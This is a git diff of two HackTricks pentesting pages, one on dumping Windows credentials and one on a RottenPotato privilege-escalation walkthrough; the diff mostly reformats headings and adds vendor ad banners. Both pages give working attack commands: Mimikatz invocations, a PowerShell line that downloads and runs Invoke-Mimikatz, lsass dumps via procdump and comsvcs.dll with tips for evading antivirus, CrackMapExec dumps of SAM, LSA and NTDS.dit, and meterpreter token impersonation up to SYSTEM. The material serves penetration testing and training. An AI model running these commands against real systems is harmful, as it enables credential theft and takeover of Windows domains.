||||
{% hint style="danger" %}
|
||||
<img src="../../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
|
||||
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
|
||||
|
||||
# Credentials Mimikatz
|
||||
{% embed url="https://securityboat.in/contact-us" %}
|
||||
{% endhint %}
|
||||
|
||||
## Credentials Mimikatz
|
||||
|
||||
```bash
|
||||
#Elevate Privileges to extract the credentials
|
||||
|
@ -33,7 +39,7 @@ mimikatz "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump
|
|||
|
||||
**Find other things that Mimikatz can do in** [**this page**](credentials-mimikatz.md)**.**
|
||||
|
||||
## Invoke-Mimikatz
|
||||
### Invoke-Mimikatz
|
||||
|
||||
```bash
|
||||
IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1')
|
||||
|
@ -43,7 +49,7 @@ Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "sekurlsa::logonpa
|
|||
|
||||
[**Learn about some possible credentials protections here.**](credentials-protections.md) **This protections could prevent Mimikatz from extracting some credentials.**
|
||||
|
||||
# Credentials with Meterpreter
|
||||
## Credentials with Meterpreter
|
||||
|
||||
Use the [**Credentials Plugin**](https://github.com/carlospolop/MSF-Credentials) **that** I have created to **search for passwords and hashes** inside the victim.
|
||||
|
||||
|
@ -63,9 +69,9 @@ mimikatz_command -f "sekurlsa::logonpasswords"
|
|||
mimikatz_command -f "lsadump::sam"
|
||||
```
|
||||
|
||||
# Bypassing AV
|
||||
## Bypassing AV
|
||||
|
||||
## Procdump + Mimikatz
|
||||
### Procdump + Mimikatz
|
||||
|
||||
As **Procdump from** [**SysInternals** ](https://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite)**is a legitimate Microsoft tool**, it's not detected by Defender.\
|
||||
You can use this tool to **dump the lsass process**, **download the dump** and **extract** the **credentials locally** from the dump.
|
||||
|
@ -93,7 +99,7 @@ This process is done automatically with [SprayKatz](https://github.com/aas-n/spr
|
|||
|
||||
**Note**: Some **AV** may **detect** as **malicious** the use of **procdump.exe to dump lsass.exe**, this is because they are **detecting** the string **"procdump.exe" and "lsass.exe"**. So it is **stealthier** to **pass** as an **argument** the **PID** of lsass.exe to procdump **instead o**f the **name lsass.exe.**
|
||||
|
||||
## Dumping lsass with **comsvcs.dll**
|
||||
### Dumping lsass with **comsvcs.dll**
|
||||
|
||||
There’s a DLL called **comsvcs.dll**, located in `C:\Windows\System32` that **dumps process memory** whenever they **crash**. This DLL contains a **function** called **`MiniDumpW`** that is written so it can be called with `rundll32.exe`.\
|
||||
The first two arguments are not used, but the third one is split into 3 parts. First part is the process ID that will be dumped, second part is the dump file location, and third part is the word **full**. There is no other choice.\
|
||||
|
@ -108,44 +114,44 @@ We just have to keep in mind that this technique can only be executed as **SYSTE
|
|||
|
||||
**You can automate this process with** [**lssasy**](https://github.com/Hackndo/lsassy)**.**
|
||||
|
||||
# CrackMapExec
|
||||
## CrackMapExec
|
||||
|
||||
## Dump SAM hashes
|
||||
### Dump SAM hashes
|
||||
|
||||
```
|
||||
cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --sam
|
||||
```
|
||||
|
||||
## Dump LSA secrets
|
||||
### Dump LSA secrets
|
||||
|
||||
```
|
||||
cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --lsa
|
||||
```
|
||||
|
||||
## Dump the NTDS.dit from target DC
|
||||
### Dump the NTDS.dit from target DC
|
||||
|
||||
```
|
||||
cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds
|
||||
#~ cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds vss
|
||||
```
|
||||
|
||||
## Dump the NTDS.dit password history from target DC
|
||||
### Dump the NTDS.dit password history from target DC
|
||||
|
||||
```
|
||||
#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --ntds-history
|
||||
```
|
||||
|
||||
## Show the pwdLastSet attribute for each NTDS.dit account
|
||||
### Show the pwdLastSet attribute for each NTDS.dit account
|
||||
|
||||
```
|
||||
#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --ntds-pwdLastSet
|
||||
```
|
||||
|
||||
# Stealing SAM & SYSTEM
|
||||
## Stealing SAM & SYSTEM
|
||||
|
||||
This files should be **located** in _C:\windows\system32\config\SAM_ and _C:\windows\system32\config\SYSTEM._ But **you cannot just copy them in a regular way** because they protected.
|
||||
|
||||
## From Registry
|
||||
### From Registry
|
||||
|
||||
The easiest way to steal those files is to get a copy from the registry:
|
||||
|
||||
|
@ -162,11 +168,11 @@ samdump2 SYSTEM SAM
|
|||
impacket-secretsdump -sam sam -security security -system system LOCAL
|
||||
```
|
||||
|
||||
## Volume Shadow Copy
|
||||
### Volume Shadow Copy
|
||||
|
||||
You can perform copy of protected files using this service. You need to be Administrator.
|
||||
|
||||
### Using vssadmin
|
||||
#### Using vssadmin
|
||||
|
||||
vssadmin binary is only available in Windows Server versions
|
||||
|
||||
|
@ -196,7 +202,7 @@ $voume.Delete();if($notrunning -eq 1){$service.Stop()}
|
|||
|
||||
Code from the book: [https://0xword.com/es/libros/99-hacking-windows-ataques-a-sistemas-y-redes-microsoft.html](https://0xword.com/es/libros/99-hacking-windows-ataques-a-sistemas-y-redes-microsoft.html)
|
||||
|
||||
## Invoke-NinjaCopy
|
||||
### Invoke-NinjaCopy
|
||||
|
||||
Finally, you could also use the [**PS script Invoke-NinjaCopy**](https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-NinjaCopy.ps1) to make a copy of SAM, SYSTEM and ntds.dit.
|
||||
|
||||
|
@ -204,12 +210,12 @@ Finally, you could also use the [**PS script Invoke-NinjaCopy**](https://github.
|
|||
Invoke-NinjaCopy.ps1 -Path "C:\Windows\System32\config\sam" -LocalDestination "c:\copy_of_local_sam"
|
||||
```
|
||||
|
||||
# **Active Directory Credentials - NTDS.dit**
|
||||
## **Active Directory Credentials - NTDS.dit**
|
||||
|
||||
**The Ntds.dit file is a database that stores Active Directory data**, including information about user objects, groups, and group membership. It includes the password hashes for all users in the domain.
|
||||
|
||||
The important NTDS.dit file will be **located in**: _%SystemRoom%/NTDS/ntds.dit_\
|
||||
__This file is a database _Extensible Storage Engine_ (ESE) and is "officially" composed by 3 tables:
|
||||
\_\_This file is a database _Extensible Storage Engine_ (ESE) and is "officially" composed by 3 tables:
|
||||
|
||||
* **Data Table**: Contains the information about the objects (users, groups...)
|
||||
* **Link Table**: Information about the relations (member of...)
|
||||
|
@ -217,9 +223,9 @@ __This file is a database _Extensible Storage Engine_ (ESE) and is "officially"
|
|||
|
||||
More information about this: [http://blogs.chrisse.se/2012/02/11/how-the-active-directory-data-store-really-works-inside-ntds-dit-part-1/](http://blogs.chrisse.se/2012/02/11/how-the-active-directory-data-store-really-works-inside-ntds-dit-part-1/)
|
||||
|
||||
Windows uses _Ntdsa.dll_ to interact with that file and its used by _lsass.exe_. Then, **part** of the **NTDS.dit** file could be located **inside the **_**lsass**_** memory** (you can find the lastet accessed data probably because of the performance impruve by using a **cache**).
|
||||
Windows uses _Ntdsa.dll_ to interact with that file and its used by _lsass.exe_. Then, **part** of the **NTDS.dit** file could be located **inside the \_lsass**\_\*\* memory\*\* (you can find the lastet accessed data probably because of the performance impruve by using a **cache**).
|
||||
|
||||
### Decrypting the hashes inside NTDS.dit
|
||||
#### Decrypting the hashes inside NTDS.dit
|
||||
|
||||
The hash is cyphered 3 times:
|
||||
|
||||
|
@ -229,7 +235,7 @@ The hash is cyphered 3 times:
|
|||
|
||||
**PEK** have the **same value** in **every domain controller**, but it is **cyphered** inside the **NTDS.dit** file using the **BOOTKEY** of the **SYSTEM file of the domain controller (is different between domain controllers)**. This is why to get the credentials from the NTDS.dit file **you need the files NTDS.dit and SYSTEM** (_C:\Windows\System32\config\SYSTEM_).
|
||||
|
||||
## Copying NTDS.dit using Ntdsutil
|
||||
### Copying NTDS.dit using Ntdsutil
|
||||
|
||||
Available since Windows Server 2008.
|
||||
|
||||
|
@ -239,7 +245,7 @@ ntdsutil "ac i ntds" "ifm" "create full c:\copy-ntds" quit quit
|
|||
|
||||
You could also use the [**volume shadow copy**](./#stealing-sam-and-system) trick to copy the **ntds.dit** file. Remember that you will also need a copy of the **SYSTEM file** (again, [**dump it from the registry or use the volume shadow copy**](./#stealing-sam-and-system) trick).
|
||||
|
||||
## **Extracting hashes from NTDS.dit**
|
||||
### **Extracting hashes from NTDS.dit**
|
||||
|
||||
Once you have **obtained** the files **NTDS.dit** and **SYSTEM** you can use tools like _secretsdump.py_ to **extract the hashes**:
|
||||
|
||||
|
@ -257,7 +263,7 @@ For **big NTDS.dit files** it's recommend to extract it using [gosecretsdump](ht
|
|||
|
||||
Finally, you can also use the **metasploit module**: _post/windows/gather/credentials/domain\_hashdump_ or **mimikatz** `lsadump::lsa /inject`
|
||||
|
||||
# Lazagne
|
||||
## Lazagne
|
||||
|
||||
Download the binary from [here](https://github.com/AlessandroZ/LaZagne/releases). you can use this binary to extract credentials from several software.
|
||||
|
||||
|
@ -265,13 +271,13 @@ Download the binary from [here](https://github.com/AlessandroZ/LaZagne/releases)
|
|||
lazagne.exe all
|
||||
```
|
||||
|
||||
# Other tools for extracting credentials from SAM and LSASS
|
||||
## Other tools for extracting credentials from SAM and LSASS
|
||||
|
||||
## Windows credentials Editor (WCE)
|
||||
### Windows credentials Editor (WCE)
|
||||
|
||||
This tool can be used to extract credentials from the memory. Download it from: [http://www.ampliasecurity.com/research/windows-credentials-editor/](https://www.ampliasecurity.com/research/windows-credentials-editor/)
|
||||
|
||||
## fgdump
|
||||
### fgdump
|
||||
|
||||
Extract credentials from the SAM file
|
||||
|
||||
|
@ -280,7 +286,7 @@ You can find this binary inside Kali, just do: locate fgdump.exe
|
|||
fgdump.exe
|
||||
```
|
||||
|
||||
## PwDump
|
||||
### PwDump
|
||||
|
||||
Extract credentials from the SAM file
|
||||
|
||||
|
@ -290,14 +296,20 @@ PwDump.exe -o outpwdump -x 127.0.0.1
|
|||
type outpwdump
|
||||
```
|
||||
|
||||
## PwDump7
|
||||
### PwDump7
|
||||
|
||||
Download it from:[ http://www.tarasco.org/security/pwdump\_7](http://www.tarasco.org/security/pwdump\_7) and just **execute it** and the passwords will be extracted.
|
||||
|
||||
# Defenses
|
||||
## Defenses
|
||||
|
||||
[**Learn about some credentials protections here.**](credentials-protections.md)
|
||||
|
||||
{% hint style="danger" %}
|
||||
<img src="../../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
|
||||
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
|
||||
|
||||
{% embed url="https://securityboat.in/contact-us" %}
|
||||
{% endhint %}
|
||||
|
||||
<details>
|
||||
|
||||
|
@ -314,5 +326,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
|
||||
# RottenPotato
|
||||
|
||||
<details>
|
||||
|
||||
|
@ -16,10 +16,16 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
|
||||
</details>
|
||||
|
||||
{% hint style="danger" %}
|
||||
<img src="../../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
|
||||
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
|
||||
|
||||
{% embed url="https://securityboat.in/contact-us" %}
|
||||
{% endhint %}
|
||||
|
||||
The info in this page info was extracted [from this post](https://www.absolomb.com/2018-05-04-HackTheBox-Tally/)
|
||||
|
||||
Service accounts usually have special privileges \(SeImpersonatePrivileges\) and this could be used to escalate privileges.
|
||||
Service accounts usually have special privileges (SeImpersonatePrivileges) and this could be used to escalate privileges.
|
||||
|
||||
[https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/](https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/)
|
||||
|
||||
|
@ -27,7 +33,7 @@ I won’t go into the details on how this exploit works, the article above expla
|
|||
|
||||
Let’s check our privileges with meterpreter:
|
||||
|
||||
```text
|
||||
```
|
||||
meterpreter > getprivs
|
||||
|
||||
Enabled Process Privileges
|
||||
|
@ -47,7 +53,7 @@ Excellent, it looks like we have the privileges we need to perform the attack. L
|
|||
|
||||
Back on our meterpreter session we load the `incognito` extension.
|
||||
|
||||
```text
|
||||
```
|
||||
meterpreter > use incognito
|
||||
Loading extension incognito...Success.
|
||||
meterpreter > list_tokens -u
|
||||
|
@ -67,7 +73,7 @@ No tokens available
|
|||
|
||||
We can see we currently have no Impersonation Tokens. Let’s run the Rotten Potato exploit.
|
||||
|
||||
```text
|
||||
```
|
||||
meterpreter > execute -f rottenpotato.exe -Hc
|
||||
Process 3104 created.
|
||||
Channel 2 created.
|
||||
|
@ -88,7 +94,7 @@ NT AUTHORITY\SYSTEM
|
|||
|
||||
We need to quickly impersonate the token or it will disappear.
|
||||
|
||||
```text
|
||||
```
|
||||
meterpreter > impersonate_token "NT AUTHORITY\\SYSTEM"
|
||||
[-] Warning: Not currently running as SYSTEM, not all tokens will beavailable
|
||||
Call rev2self if primary process token is SYSTEM
|
||||
|
@ -100,7 +106,12 @@ Server username: NT AUTHORITY\SYSTEM
|
|||
|
||||
Success! We have our SYSTEM shell and can grab the root.txt file!
|
||||
|
||||
{% hint style="danger" %}
|
||||
<img src="../../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
|
||||
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
|
||||
|
||||
{% embed url="https://securityboat.in/contact-us" %}
|
||||
{% endhint %}
|
||||
|
||||
<details>
|
||||
|
||||
|
@ -117,5 +128,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
|
Loading…
Reference in a new issue